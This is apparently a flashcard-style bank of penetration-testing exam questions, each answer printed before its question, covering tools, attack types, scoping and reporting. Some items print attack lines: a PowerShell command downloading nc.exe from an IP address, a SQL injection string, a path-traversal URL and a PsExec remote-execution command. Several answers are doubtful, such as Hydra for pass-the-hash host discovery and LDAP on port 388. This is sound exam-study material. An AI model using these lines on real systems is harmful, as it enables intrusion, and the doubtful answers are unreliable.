A team of testers is conducting an assessment for an organization. The team is not concerned with assessing a broad range of vulnerabilities. Instead, they are conducting a coordinated attack governed by very narrow objectives. The rules of engagement specify that they can use physical, electronic, and social exploits to achieve their objective. What kind of penetration test is happening in this scenario?
Hydra
A tester has captured NTLM hashes and wants to conduct a pass-the-hash attack. Unfortunately, the tester doesn't know which systems on the network may accept the hash. What tool should the tester use to conduct the test?
Browser Exploitation Framework (BeEF)
A tester using penetration testing wants to deploy a malicious website at part of the test to exploit the browsers belonging to the client's employees. What tool can the test utilize?
Keylogger
A user has noticed that their machine has been acting unpredictably over the past week. They have been experiencing slowness and input lag. The user has found a few text files that appear to contain bits of their emails and some instant messenger conversations. The user runs a virus scan where nothing is detected. What type of malware maybe affecting this machine?
Cross-site scripting
A web application has been developed to target browsers and permit access into different banking accounts. This application takes a few dollars from one account and sends it to a foreign account. What type of attack has just occurred?
Hard-coded credentials
A web application programmer has included the username and password required to access a database instance within the application's PHP code. This is an example of which unsecure code practice?
threat actor
A(n) __________ is an individual or group with the capability and motivation necessary to manifest a threat to an organization and deploy exploits against its assets.
While testing is being performed
When should you start to write a penetration testing report?
Target = [{"HostName":"FS1"}]
As a part of a gray box penetration test, you need to create a Python script to run an exploit against the target organization. As a part of the script, you need to insert a value of FS1 into an element named HostName within an associative array named Target. Which of the following lines of code will do this?
sslyze
As the part of information gathering process during a gray box penetration test, you need to perform a certificate inspection on the target organization's internal web server. Which utility could you use on your Kali Linux laptop to do this?
Identify assets
According to Microsoft's published procedures, what is the first step in threat modeling?
Document technical exploits that were effective during the test. Identify exploits that were not effective during the test.
After completing a penetration test for a client, you meet with your penetration testing team to review lessons learned. What should you do in this meeting? (Choose two.)
Immediately halt testing and call an emergency meeting with the client
After obtaining a low-privilege shell on a target server and beginning work on privilege escalation, you identify a netcat process running on an unprivileged port returning a /bin/bash instance to an IP address that is not part of any address block used by either your penetration testing organization or the client. What is the appropriate action to take in this case?
The device is tuned more toward false positives.
After several attempts, a tester was able to gain unauthorized access through a biometric sensor by using the tester's own fingerprint without exploitation. What happened with the biometric device that allowed the tester to gain access?
Employee bank accounts managed by a different company
All the following assets may be candidates for target selection for a penetration test except:
Rival corporations Third-party media organizations
All the following may typically be considered stakeholders in the findings of a penetration test except which two?
Man-in-the-middle
An ARP spoofing attack is categorized as which type of exploit?
Nation-state
An attacker carries out an attack against a government contractor in a neighboring country, with the goal of gaining access through the contractor to the rival country's governmental network infrastructure. The government of the attacker's own country is directing and funding the attack. What type of threat actor is this?
Script kiddie
An attacker downloads the Low Orbit Ion Cannon from the Internet and then uses it to conduct a denial-of-service attack against a former employer's website. What kind of attacker is this?
Hacktivist
An attacker has attacked a government agency because he or she is unhappy with a new law that has been passed. What type of threat actor is this?
Hacktivist
An attacker who is a passionate advocate for brine shrimp attacks and defaces the website of a company that harvests brine shrimp and sells them as fish food. What type of attacker is this?
Malicious insider
An employee has just received a very negative performance review from his manager. The employee feels the review was biased and the poor rating unjustified. In retaliation, the employee accesses confidential employee compensation information from an HR database server and posts it anonymously on Glassdoor. What kind of attacker is this?
Implement an HTTP downgrade attack.
An evil twin has been successfully deployed by a penetration tester and is beginning to see some victim traffic. What would be the next step that the tester would want to take to capture all of the unencrypted web traffic from the victim?
$Target.HostName = 'FS1'
As a part of a gray box penetration test, you need to create a PowerShell script to run an exploit against the target organization. As a part of the script, you need to insert a value of FS1 into an element named HostName within an associative array named Target. Which of the following lines of code will do this?
-p U:20,T:21,22
Which command option will cause nmap to scan just UDP port 20 and TCP ports 21 and 22?
Once a year Whenever significant changes are made to the network infrastructure
An online retailer directly handles payment processing for credit card orders. As such, the credit card companies require the organization to PCI-DSS compliant. When must this organization conduct penetration testing? (Choose two.)
Transference
An organization has recently learned that its facility has been built within a few hundred yards of a major fault line. The management team decides to purchase an extended insurance policy that will cover a loss of business operations should an earthquake occur. Which type of risk response is described in this scenario?
False positive
An organization is using a tool to perform a source code review. The penetration tool incorrectly identifies a vulnerability. What is it called when this happens?
Supply chain
An organization's network was recently hacked. The attackers first compromised the weak security used by one of the organization's contractors. Then they used the contractor's authentication credentials to gain access to the organization itself. Which type of penetration assessment could have prevented this?
WiFite Kismet
As a part of a black box penetration test, you've discovered that the target organization's wireless network signal is emanating out into the parking lot and across the street. You want to access the internal network using this wireless network radio signal. However, the wireless network is encrypted. Which wireless compromise tools could you use to do this? (Choose two.)
echo $TargetHost
As a part of a gray box penetration test, you need to create a Bash script to run an exploit against the target organization. As a part of the script, you need to display the value of a variable named TargetHost on the screen. Which command will do this?
Target[HostName] = FS1
As a part of a gray box penetration test, you need to create a Bash script to run an exploit against the target organization. As a part of the script, you need to insert a value of FS1 into an element named HostName within an associative array named Target. Which of the following lines of code will do this?
-gt
As a part of a gray box penetration test, you need to create a Bash script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two integer variables to test whether one is numerically greater than the other. Which relational operator should you use?
<> !=
As a part of a gray box penetration test, you need to create a Python script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two variables that tests whether they are not equal. Which relational operators could you use? (Choose two.)
==
As a part of a gray box penetration test, you need to create a Python script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two variables to test whether they are equal. Which relational operator should you use?
_Target = {"HostName" => "FS1"}
As a part of a gray box penetration test, you need to create a Ruby script to run an exploit against the target organization. As a part of the script, you need to insert a value of FS1 into an element named HostName within an associative array named Target. Which of the following lines of code will do this?
==
As a part of a gray box penetration test, you need to create a Ruby script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two variables to test whether they are equal. Which relational operator should you use?
nmap hping
As a part of a penetration test, you need to establish an active connection to the computer systems and devices at the target organization to enumerate and fingerprint them. Which tools could you use to do this? (Choose two.)
John the Ripper Cain and Abel
As a part of a penetration test, you need to gather user account names and passwords from the passwd and shadow files from a Linux server. Which utilities could you use to do this? (Choose two.)
OWASP ZAP Nessus
As a part of a penetration test, you need to perform an in-depth scan of a target to identify vulnerabilities, such as missing updates or misconfigured security settings. Which utilities could you use to do this?
whois nslookup
As a part of a penetration test, you need to perform reconnaissance on the target organization to passively gather information. Which tools could you use to do this? (Choose two.)
ncat
As a part of a penetration test, you want to access a shell session on a target Windows server. Which utility could be used to do this?
IDA Hopper
As a part of a penetration test, you want to reverse compile the executable for an in-house developed application used by the target organization. Which of the following tools can be used to do this? (Choose two.)
Fence jumping
As a penetration tester approaches the main entrance to the target organization's physical facility, she notices that a turnstile is used to control access. She carefully steps over the turnstile instead of walking through it. What is this technique called?
hashcat
As a penetration tester, you want to improve your password cracking speed by building a specialized system with multiple video boards installed. Which tool can take advantage of multiple GPUs for password cracking?
nmap 192.168.1.200 -p http,https nmap 192.168.1.200 -p 80,443
As a penetration tester, you want to scan a Linux server with an IP address of 192.168.1.200 in the target network and see whether it has a web server installed and running. Which nmap commands will do this? (Choose two.)
nmap 192.168.1.200 --top-ports 1000 --exclude-ports 53
As a penetration tester, you want to scan a Linux server with an IP address of 192.168.1.200 in the target network for the 1000 most popular network services to see whether they are installed and running. However, you already know this host is running the DNS service, so you want to skip this port in the scan. Which nmap command will do this?
Code signing
As defined by the OWASP Mobile Security Testing Guide, which core feature of the iOS security architecture ensures that only applications explicitly approved by Apple can run on the device?
Set to promiscuous mode.
As part of a gray box penetration test, you need to capture packets on a wired network. How must the wired network interface in your laptop be configured to accomplish this?
Connect your laptop to a mirror port on the switch.
As part of a gray box penetration test, you need to capture packets on a wired network. You've configured the network interface in your laptop to accept all frames transmitted on the network medium, and you have installed Wireshark. However, when you run Wireshark, you only see frames that are addressed specifically to your laptop. How can you fix this?
The network uses a switch.
As part of a gray box penetration test, you need to capture packets on a wired network. You've configured the network interface in your laptop to accept all frames transmitted on the network medium, and you have installed Wireshark. However, when you run Wireshark, you only see frames that are addressed specifically to your laptop. Why did this happen?
dig axfr @nameserver target_domain host -t axfr target_domain nameserver
As part of the information gathering phase of a black box penetration test, you need to perform a DNS zone transfer of the target organization's domain. Which of the following commands could you use to do this? (Choose two.)
Carefully document everything you do as you conduct the test.
As you are conducting a penetration test for a client, you want to make sure the post-engagement cleanup process goes smoothly. What should you do to accomplish this?
Static code analysis
Austin is performing a white box penetration test. The target organization relies heavily on an application that was developed by internal programmers. The test scope specifies that he be given access to this application's source code. Austin has an extensive programming background, so he analyzes the code line by line looking for vulnerabilities. What kind of application analysis is happening in this scenario?
Try to compromise an internal host and use it as a pivot.
Brittany is running a black box penetration test. She wants to run a vulnerability scan of the target organization's internal network. What should she do?
Alteration
Brittany is running a gray box penetration test. She discovers a flaw in an HR web application. Using a SQL injection attack, she can add or remove hours to or from an employee's timecard for the current pay period. Which penetration testing goal has she accomplished?
It allows for interactive or non-interactive command execution.
Bash is a command shell and language interpreter that is available for operating systems such as Linux, Mac OS X, and even Windows. The name bash is an acronym for the Bourne-Again shell. What does a shell do?
Pass-the-hash
Because password hashes cannot be reversed, instead of trying to figure out a user's password, what type of attack can be used to log in to another client or server?
Recommend increased password complexity requirements. Recommend requiring that all employees take security awareness training. Recommend upgrading the cipher suite used for the VPN solution.
By using phishing, a penetration tester was able to retrieve the initial VPN user domain credentials from a member of the IT department. Then the tester obtained hashes over the VPN and effortlessly cracked them by using a dictionary attack. The tester should recommend which of the following remediation steps to the client? (Choose three.)
Passive information gathering
What is the process of assessing a target to collect preliminary knowledge about systems, software, networks, or people without directly engaging the target or its assets?
Enumeration
What is the process of finding all available information on a target system or service in support of developing a plan of attack?
Kerberoasting
During a gray box penetration test, the tester logs on to the target organization's domain and requests a service principle name (SPN) for registered service. A ticket is received, and the tester takes it offline and attempts to crack its encryption. What is this exploit called?
Zmap
Censys was created at the University of Michigan by the team of researchers who also developed what wide-scale Internet-scanning tool?
PSExec
Complete the following command to launch the calculator on a compromised Windows system: ___________ \\VICTIM -d -i calc.exe
Burp Suite OWASP ZAP
During a gray box penetration test, the tester needs to proxy connections between the target organization's web application server and client systems running web browsers. Which web proxy penetration testing tools could the tester use to do this? (Choose two.)
To cause a full or partial DoS condition
What is the purpose of jamming wireless signals or causing wireless network interference?
OSSTMM
What penetration testing methodology was created by Pete Herzog?
The New-ObjectSystem.Net.WebClient PowerShell script is downloading a file from 192.168.78.147.
Consider the following example: (New-Object System.Net.WebClient).DownloadFile("http://192.168.78.147/nc.exe","nc.exe") What is this code doing?
Read, write, execute
Consider the following example: omar@ares:~$ ls -l topsecret.txt-rwxrwxr-- 1 omar omar 15 May 26 21:15 topsecret.txt What permissions does the user omar have in the topsecret.txt file?
SQL injection
Consider the following string: Ben' or '1'='1 This string is an example of what type of attack?
Developers who design IoT devices are not as concerned with security.
Consumer-based Internet of Things (IoT) devices are usually less secure than systems that are designed for conventional desktop computers. Why is this statement true?
De-escalation
During a penetration test, the client organization begins to receive complaints from remote workers indicating that the organization's VPN is down. The network administrator discovers a local area network denial (LAND) attack underway that is aimed at the company's VPN server at the edge of the network. The remote workers are unable to work, so the administrator calls the penetration tester and asks them to dial back the attack. What is this communication path called?
Domain administrator fax
Domain registration information returned on a WHOIS search does not include which of the following?
Default credentials attack
During a black box penetration test, the tester discovers that the organization's wireless access point has been configured with an administrative username of admin and a password of Admin. The tester gains administrative access to the access point. What kind of authentication exploit occurred in this scenario?
Replay attack
During a black box penetration test, the tester parks in the target organizations parking lot and captures wireless network signals emanating from the building with his laptop. By doing this, he is able to capture the handshake process used by an authorized wireless client as it connects to the network. He later resends this handshake on the wireless network, allowing his laptop to connect to the wireless network as that authorized client. What kind of exploit is this?
proxychains
During a black box penetration test, you need to use evasion to obscure your presence from system administrators in the target organization. Which tool could you use to do this?
Downgrade
During a gray box penetration test, the tester acts as a man-in-the-middle between a web server and an end user's workstation. When the user's browser requests a page from the web server using TLS 1.2, the tester alters the request and specifies that SSL 2.0 be used instead to protect the session. What kind of exploit has occurred in this scenario?
DLL hijacking
During a gray box penetration test, the tester creates a phishing campaign that tricks users into downloading a Trojan horse application that quietly replaces a key dynamic link library file on the local system with a modified version that loads a keylogger when executed. What is this type of exploit called?
Distributed denial of service (DDoS)
During a gray box penetration test, the tester decides to stress test a critical network router. She sends thousands of ping requests addressed to all of the hosts on the subnet. However, she spoofs the source address of the requests to the IP address of the network router. As a result, the router is flooded with ICMP echo response traffic that it didn't initiate, making it difficult for it to respond to legitimate network requests. What kind of exploit is this?
Denial of service (DoS)
During a gray box penetration test, the tester decides to stress test the target organization's file server by sending it a flood of half-open TCP connections that never actually get completed. What kind of exploit is this?
Default account settings exploit
During a gray box penetration test, the tester discovers that one of the organization's firewalls has been configured with an administrative username of admin and a password of Admin. The tester gains administrative access to the firewall and opens holes in it. What kind of authentication exploit occurred in this scenario?
Relay attack
During a gray box penetration test, the tester is able to intercept packets being transmitted from a client to a server. The tester's workstation poses as the server to the client. The tester is able to modify the data in the packets and then send it on to the server. The tester's workstation poses as the client to the server. What kind of exploit is this?
Relay attack
During a gray box penetration test, the tester is able to intercept packets being transmitted from a client to a server. The tester's workstation poses as the server to the client. The tester views the data in the packets but does not modify it before forwarding the data on to the server. What kind of exploit is this?
Kerberos exploit
During a gray box penetration test, the tester is able to run an exploit that enables her to receive a ticket-granting ticket (TGT) from the key distribution center (KDC) in the organization's Active Directory domain. What kind of authentication exploit occurred in this scenario?
Cross-site request forgery (CSRF)
During a gray box penetration test, the tester notices that the organization's human resources self-service web application uses Active Directory user accounts for authentication. It also includes a "Remember me" option on the login page. The tester sends an email message to high-level employees within the organization with the subject line "Check out this funny picture." When the email is opened, hidden HTML code actually sends an HTTP request to the self-service web application that changes the user's password. The attack relies on the saved session cookie from the site to work. What type of authentication exploit is this?
ARP spoofing
During a gray box penetration test, the tester sends a fake ARP broadcast message on the local network segment. As a result, her laptop's MAC address is now mapped to the IP address of another valid computer on the segment. What is this exploit called?
Session hijacking
During a gray box penetration test, the tester uses Wireshark to sniff the network traffic between an employee's web browser and a website and is able to capture the session cookie. The tester is then able to impersonate the victim without capturing the user's actual authentication credentials. What type of authentication exploit was used in this scenario?
Redirect attack
During a gray box penetration test, the tester uses phishing emails to send users to a logon page that looks like the target organization's human resources self-service page. The fake page is used to capture employees' credentials. What type of authentication exploit was used in this scenario?
ncat netcat
During a gray box penetration test, the tester wants to be able to set up a bind shell exploit where a listener is set up on a compromised system on the target. Which remote access tools could be used to do this?
netcat
During a gray box penetration test, the tester wants to be able to set up a reverse shell exploit where a compromised system on the target network "calls home" to a listener set up on the tester's laptop to enable the tester to remote control the compromised system. Which remote access tool could be used to do this?
ARP spoofing
During a gray box penetration test, the tester wants to implement a downgrade man-in-the-middle attack to reduce the security of web browser sessions from TLS to SSL. What exploit can the attacker use to trick client workstations into thinking her workstation is the web server and vice versa?
Responder
During a gray box penetration test, the tester wants to poison queries for the target organization's domain controller in order to redirect client requests to the tester's laptop and capture usernames and hashed passwords. Which utility could be used to do this?
SMTP relay
During a gray box penetration test, you discover an open SMTP service running on an older database server. You want to use this SMTP service to send phishing emails to users within the organization. What is this exploit called?
Telnet to the SMTP server's IP address on port 25 and create the messages.
During a gray box penetration test, you discover an open SMTP service running on an older database server. You want to use this SMTP service to send whaling emails to the organization's CEO and CFO. How can you do this remotely from your laptop?
Windows
During a gray box penetration test, you run an nmap scan of a system discovered on the network. You find that TCP ports 139, 443, and 3389 are open. What operating system is most likely running on the system?
Spoof your laptop with the MAC address of an authorized device.
During a gray box penetration test, you try to connect your laptop to the target's wireless network. However, the target has implemented a NAC that is blocking your laptop from connecting to the production network. What can you do?
Session hijacking
During a penetration test of a web application, you determine that user session IDs (or tokens) are revealed in the URL after authentication. You further discover that these session IDs are predictably incremented values, and not randomly generated numbers or strings. To which of the following attack types would this application likely be susceptible?
De-escalation
During a penetration test, a tester gains physical access to the client's facility using pretexting and is able to trigger a fail-open event for all of the organization's electronic locking systems. As a result, all of the doors in the facility are unlocked. The client's internal security team calls the penetration tester and asks them to stop the attack and immediately re-enable the door locks. What is this process called?
De-confliction
During a penetration test, an individual is caught trying to piggyback into the client organization's facility. The trespasser claims to be a penetration tester and insists on being released. Prior to pressing criminal charges, a member of the client's IT staff calls the penetration tester to determine whether the trespasser is really a member of the penetration testing team. What is this communication path called?
Avoidance
During a penetration test, an unmonitored side door was left ajar by an employee, which the tester then used to gain physical access to the client's facility. To keep this from happening again, the client completely removes the door and its frame from the building and fills the space with concrete. Which type of risk response is described in this scenario?
Mitigation
During a penetration test, an unmonitored side door was left ajar by an employee, which the tester then used to gain physical access to the client's facility. To keep this from happening again, the client places a security guard in the hallway and instructs her to prevent unauthorized access. Which type of risk response is described in this scenario?
De-escalation
During a penetration test, the client organization begins to receive complaints from customers indicating that the organization's web server is very slow to respond or even crashes at times. The network administrator discovers a distributed denial of service (DDoS) attack underway that is aimed at the company's web server. Sales are being lost, so the administrator calls the penetration tester and asks them to stop the attack. What is this communication path called?
A tension wrench A lock pick tool
What tools are required, at a minimum, to pick a lock? (Choose two.)
De-confliction
During a penetration test, the client organization's network administrator discovers a distributed denial of service (DDoS) attack underway that is aimed at the company's web server. The administrator calls the penetration tester to verify that the attack is part of the penetration test and not coming from a real attacker. What is this process called?
De-confliction
During a penetration test, the client organization's network administrator discovers a teardrop attack underway that is aimed at the company's perimeter router. The administrator calls the penetration tester to see whether the attack is part of the penetration test. What is this communication path called?
Hydra Medusa
During a penetration test, the system administrator checks the log of the Linux server and notices thousands of unsuccessful login attempts. Which tool could the penetration tester be using? (Choose two.)
Cold boot attack
During a penetration test, the tester gains physical access to a Windows server system and reboots it from a flash drive that has a Linux distribution installed on it. She is able to bypass security and copy key files from the server to the flash drive for later cracking and analysis. What type of exploit occurred in this scenario?
Consult the rules of engagement to determine the next individual in the communications path
During a penetration test, you determine that you require additional information before testing a discovered web application, but your point of contact is unresponsive. Which of the following describes the best course of action in this situation?
Recommend they use SSL-enabled LDAP on port 636.
During a penetration test, you discover that an administrator is using clear-text LDAP on port 388 to update user accounts in their LDAP-compliant directory service, including user credentials. What should you recommend the client do to fix this?
Rewrite the application to encrypt passwords before they are saved in the database.
During a penetration test, you discover that your client uses a web application that was developed in-house that stores user passwords as clear text within a MySQL database. What should you recommend?
Exploit chaining
During a penetration test, you identify a live local file inclusion (LFI) vulnerability on a web application that allows you to see any file on the target system, including the /etc/passwd and /etc/shadow files. With this information, you feed password hashes from the shadow file into hashcat and crack them with a dictionary attack, ultimately finding a match that allows you to obtain a low-privilege shell on the target system. What is this an example of?
Brute force
During a penetration test, you identify and harvest encrypted user passwords from a web application database. You do not have access to a rainbow table for the encryption algorithm used, and do not have any success with dictionary attacks. What remaining attack method—typically one of last resort—could you leverage as an attacker to attempt to decrypt the passwords you have harvested?
Fear
During a penetration test, you send an email to the CFO of the target organization. The email claims that the webcam on the CFO's laptop has been clandestinely used to record him viewing pornography. The email threatens to post this video and notify his family, his employer, and the police if he doesn't respond with certain sensitive information about his company. Which motivation factor was used in this scenario?
Acceptance
During a penetration test, your testers discovered that they could easily copy confidential data to their personal mobile devices and then send that data to recipients outside the organization using their devices' mobile broadband connection. You recommend that they implement a mobile device management (MDM) system. However, the client has determined that such a measure is too expensive and complicated to implement. In fact, they will not implement any type of controls to prevent this from happening in the future. Which type of risk response is described in this scenario?
A clickjacking attack
During a web application penetration test, a penetration tester observes that the content security policy header is missing. What type of attack would the tester most likely perform next?
Services installed The version of the operating system installed
During a white box penetration test, you use the nmap utility to scan an entire subnet for hosts. Once the scan is complete, you need to enumerate the systems found. What information do you need to identify for each device discovered? (Choose two.)
Responder
During an internal penetration test, several multicast and broadcast name resolution requests are observed moving through the network. A tester wants to impersonate network resources and collect authentication requests. What tool should be used?
Immediately alert the client with details of the findings.
During penetration testing of a client's core server, a tester discovers a critical vulnerability. What should the tester do next?
Following an attempted test, the system becomes unavailable. The system shows an indication of prior unauthorized access.
During the course of a penetration test, the tester needs to communicate with a client. Which of the following situations would cause this communication to occur? (Choose two.)
Set to monitor mode.
During the information gathering phase of a black box penetration test, you need to eavesdrop on radio frequency emissions emanating from the target's facility and attempt to capture data from its wireless network. You are parked in the organization's parking lot. How must the wireless network interface in your laptop be configured to do this?
airodump-ng
During the information gathering phase of a black box penetration test, you need to eavesdrop on radio frequency emissions emanating from the target's facility and attempt to capture data from its wireless network. You are parked in the organization's parking lot. You want to use aircrack-ng to crack the encryption used by the Wi-Fi network. To accomplish this, you first need to capture the authentication handshake. Which utility should you run on your laptop to do this?
aircrack-ng
During the information gathering phase of a black box penetration test, you need to eavesdrop on radio frequency emissions emanating from the target's facility and attempt to capture data from their wireless network. Before you can do this, you must break the encryption used on the Wi-Fi network. You are parked in the organization's parking lot. Which utility could you use on your Linux laptop to do this?
aireplay-ng
During the information gathering phase of a black box penetration test, you need to eavesdrop on radio frequency emissions emanating from the target's facility and attempt to capture data from their wireless network. You have already captured the authentication handshake. You next need to deauthenticate the wireless client so you can begin capturing data. Which utility should you run on your laptop to do this?
Critical
During the process of completing a penetration test on your company's network, you identify a server that is publicly available on the Internet and is vulnerable to a remote unauthenticated exploit. What kind of risk rating would you assign to this finding?
Shells Files Scripts
During the testing phase, you are able to compromise a number of client machines by using Metasploit exploit modules. What types of things might you need to clean up from those systems during post-engagement activities? (Select all that apply.)
The Actions on Objectives phase
During what phase of the Cyber Kill Chain does an attacker steal sensitive information, use unauthorized computing resources to engage in denial-of-service attacks, or modify information?
Passwords stored in plaintext
Encryption at rest and in transit are the best recommended mitigation techniques for which of the following findings in a penetration test?
Weak password complexity
Enforcing minimum password requirements and preventing users from choosing passwords found in common dictionary files would best mitigate what type of finding?
Communication escalation path
Found in the ROE, which component tells the penetration tester(s) who to contact in the event of an issue during an engagement, and how?
Master service agreement
General terms for future agreements and conditions such as payment schedules, intellectual property ownership, and dispute resolution are typically addressed in which contractual document between a penetration tester and their client?
Compliance-based
What type of assessment gauges an organization's implementation of and adherence to a given set of security standards defined for a given environment?
technical constraint
Identified by the target audience of a penetration test, a(n) __________ is a specific technological challenge that could significantly impact an organization (for example, a mission-critical host or delicate legacy equipment that is scheduled for replacement).
Statement of work
If travel to remote field offices or data centers is required as part of a penetration test, in what contractual document would this usually be found?
Ransomware
In 2017 a number of attacks resulted in the end users' data being encrypted and/or stolen and then held by the attacker for payment. Which type of attack is this?
Identify threats
In Microsoft's guidance on threat modeling, which step involves the categorization of external and internal threats to an organization?
case
In a Bash script, you need to prompt the user to select from one of seven different options presented with the echo command. Which control structure would best evaluate the user's input and run the appropriate set of commands?
IP addresses Domain names
In a penetration test, it often occurs that a great deal of information pertinent to attacking target systems and goals is provided to the penetration tester. Which of the following are often provided by the target organization? (Choose two.)
Command injection
In a text field on a web application, you discover that by entering a semicolon and the *nix command `id`, you can find the username context for the application on the server. What is this an example of?
SCAP
In addition to serving as a method of policy compliance evaluation, __________ is a method for using specific standards for automated discovery and measurement of vulnerabilities.
Assisting the organization with asset categorization and implementation of industry best practices
In addition to their value in compliance-based penetration tests, which of the following is another benefit of the use of testing an environment against CIS preconfigured operational baseline scan templates?
The tester requires sufficient access to the information and resources necessary to successfully complete a full audit.
In compliance-based testing, why is it problematic for a penetration tester to have only limited or restricted access to an organization's network or systems?
Retina scan
In terms of multifactor authentication, which of the following is an example of something you are?
PIN
In terms of multifactor authentication, which of the following is an example of something you know?
Hardwire connection to the organization's internal LAN
In terms of multifactor authentication, which of the following is an example of somewhere you are?
RFID proximity reader
In terms of multifactor authentication, which of the following is an example of somewhere you are?
Sending a pre-engagement survey (also known as a scoping document) to the client for them to fill out
In the scoping phase of a penetration testing engagement, how might a penetration tester effectively obtain the information necessary to begin testing?
Gray box assessment
In which type of penetration test does the tester have a limited amount of information about the target environment but is not granted full access?
Bluejacking
What type of attack is being carried out when a target is being sent unsolicited messages through Bluetooth?
Milestone/stage based
It is often detailed in penetration test contracts that communication with the client is expected when beginning certain phases of testing, such as when beginning a phishing campaign, or when beginning testing of a web application or specific subnet. Which of the following best describes this type of communication?
Provides a means of physical connection to an embedded system for debugging and other testing
JTAG is an IEEE standard component that is best defined as serving what purpose?
Run a test scan in a lab environment first.
Jessica is performing a white box penetration test. She needs to run an invasive vulnerability scan on the target organization's customer database server. What should she do?
whois
Jessica is running a black box penetration test. She needs to find out who the target organization's domain registrar is. She would also like to learn the organization's address and phone number. Which utility should she use?
Denial
Jessica is running a gray box penetration test. She uses the Low Orbit Ion Cannon utility to send a flood of TCP packets to a file server within the organization. As a result, the file server becomes overloaded and can no longer respond to legitimate network requests. Which penetration testing goal has she accomplished?
Availability of internal IT staff
Joshua is running a gray box penetration test. Which one of the following is least likely to have an impact upon when he can run vulnerability scans during the test?
Planning and scoping
Joshua works for a penetration testing consulting firm. During a recent penetration test, he ran an attack tool against the client's public-facing e-commerce website. It went offline for more than an hour. The client is now threatening to sue Joshua's employer. At what stage of the penetration testing process should the consulting firm and the client have agreed upon the risks associated with the test?
Alteration
Kimberly is running a gray box penetration test and discovers a flaw in an online company directory application that allows her to submit LDAP commands in an employee lookup field. She uses this flaw to add a new user account that she can use as a back door. Which penetration testing goal has she accomplished?
The -T0 option will cause the scan to take an inordinate amount of time on such a large subnet.
Kimberly is running a gray box penetration test. The target network uses a 10-net IP addressing scheme with an 8-bit subnet mask (10.0.0.0/8). She needs to run a vulnerability scan on each host on the network. She loads nmap on her laptop, which is connected to the same segment being scanned, using the -T0 option. What did she do incorrectly in this scenario?
audience
Knowing your ________ is one of the most important aspects to keep in mind when writing a report.
Read and (in some cases) execute files on the victim's system
Local file inclusion (LFI) vulnerabilities occur when a web application allows a user to submit input into files or upload files to the server. Successful exploitation could allow an attacker to perform which of the following operations?
Reconnaissance
Lockheed Martin developed the framework that is part of the Intelligence Driven Defense model for identification and prevention of cyber intrusions activity. This model identifies what the adversaries must complete in order to achieve their objective. This model is known as the Cyber Kill Chain model and is made up of seven parts. Which of the following is the first stage of the Cyber Kill Chain, when the attacker is assessing the target from outside of the organization from both a technical and nontechnical perspective?
Directory (path) traversal
What type of attack is shown in the following URL? http://portal.h4cker.org/%2e%2e%5c%2e%2e%2f%2e%2e%5c%2e%2e%5c/omar_file.txt
Slowly covering the sensor with a thin sheet of cardboard
Many devices used to deploy defense in depth in a physical environment rely on automated detection systems. Which of the following methods would be the best way for a physical penetration tester to attempt to bypass a temperature monitoring sensor?
Using the relay to send e-mail to internal or external destinations while impersonating an e-mail address
Misconfiguration of SMTP can result in "open relays," which allow anonymous user connections. How could a penetration tester exploit such a misconfiguration during a penetration test?
Disclosure
Natasha is running a gray box penetration test and discovers a flaw in a web application that allows her to directly access the information stored on the backend database server. Which penetration testing goal has she accomplished?
The SCADA devices
Natasha is running a gray box penetration test. She has initially enumerated the network using a ping sweep and has found an internal web server, a domain controller, a router, and several SCADA devices used in on the production floor. Which of these devices could potentially be disrupted by a more intense vulnerability scan? (Choose two.)
Populating graphs with data for press releases
Nessus incorporates NVD's CVSS when producing vulnerability severity information. Which of the following is not a use for this information for a penetration tester?
Insecure hidden form elements
What type of security malpractice is shown in the following example? <input type="hidden" id="123" name="price" value="100.00">
Shared local administrator credentials
Of the following choices, which type of finding is most amplified in severity by a resulting inability to confirm the source of actions taken on a given system using a highly privileged account, effectively destroying the concept of non-repudiation for a given user?
Statement of work
Of the following, which document might be consulted if the client has an issue with accepting a penetration test report that has been provided?
The risk tolerance of the client's organization
Once the completion of testing is done for a client, the tester is prioritizing the findings and recommendations for an executive summary. Which one of the following considerations would be the most beneficial to the client?
Situational awareness
One of the goals of communication between the tester and the client during a penetration test is to ensure that both parties clearly understand the current security state of the network. Which of the following terms best describes this shared understanding?
Compliance-based
One of your clients accepts credit cards from customers and uses its internal network and servers to process payments. The credit card companies each specify that the client must undergo regular penetration testing to ensure that its password policies, data isolation policies, access controls, and key management mechanisms adequately protect consumer credit card data. What type of assessment is required in this scenario?
Threat modeling
One of your clients is a public advocacy group. Some of its political stances are very unpopular with several fringe activists, and they are concerned that a hacktivist may try to hijack their public-facing website. They have asked you to run a penetration test using the same tools and techniques that a typical hacktivist would have the technical aptitude and funds to use. What process has occurred in this scenario?
Pre-merger
One of your clients was recently purchased by a large multinational organization. Before the purchase can be finalized, your client must be subjected to an extensive penetration test. What kind of assessment is required in this scenario?
De-confliction
One potential reason for communicating with the client point of contact during a penetration test is to ensure that a penetration tester's actions are clearly identifiable and distinct from the actions of system accounts or other users that may occur in the environment. What is this concept known as?
De-escalation
One potential reason for communicating with the client point of contact during a penetration test is to provide resolution if a component of testing brings down a system or service, leaving it unavailable for both legitimate users and further testing. Which term best describes this concept?
Press release drafts found on an undocumented web page inside a company's intranet
Open-source intelligence (OSINT) collection frameworks are used to effectively manage sources of collected information. Which of the following best describes open-source intelligence?
Fingerprint web application development frameworks
PHPSESSID and JSESSIONID can be used to do what?
SQL injection
Parameterization of user input and queries is the recommended mitigation technique for which class of vulnerability?
Medium
Per Microsoft's threat modeling system, what would the final risk prioritization be for this vulnerability?
Denial of service
Per US-CERT, which class of attack occurs when "an attacker attempts to prevent legitimate users from accessing information or services"? The most common method is flooding; others include resource leak exposure and excessive allocation.
Insecure Direct Object Reference
What type of vulnerabilities can be triggered by using the parameters in the following URL? http://web.h4cker.org/changepassd?user=chris
Situational awareness
Potential reasons for communicating with the client point of contact during a penetration test are to ensure client understanding of progress and actions taken and to alert the client when beginning testing on a system the client has previously identified as fragile or prone to lockups. This sort of communication is best for maintaining which of the following?
Shared local administrator credentials
Randomization of account credentials through the use of LAPS or similar commercial products such as SAPM is the best mitigation tactic for which class of finding?
Company policies Tolerance to impact
When planning for an engagement, which of the following are the most important? (Choose two.)
Authentication for SNMPv1 and v2 only requires access to the community string in use, which is sent in clear text between the manager and its agents. System default community strings (usually "public" for read-only access, and "private" for write access).
SNMP is an industry-standard network monitoring protocol that allows users to collect and alter information about various devices over a network. Which of the following are features of SNMP or its versions of implementation that can be leveraged to exploit the protocol? (Choose two.)
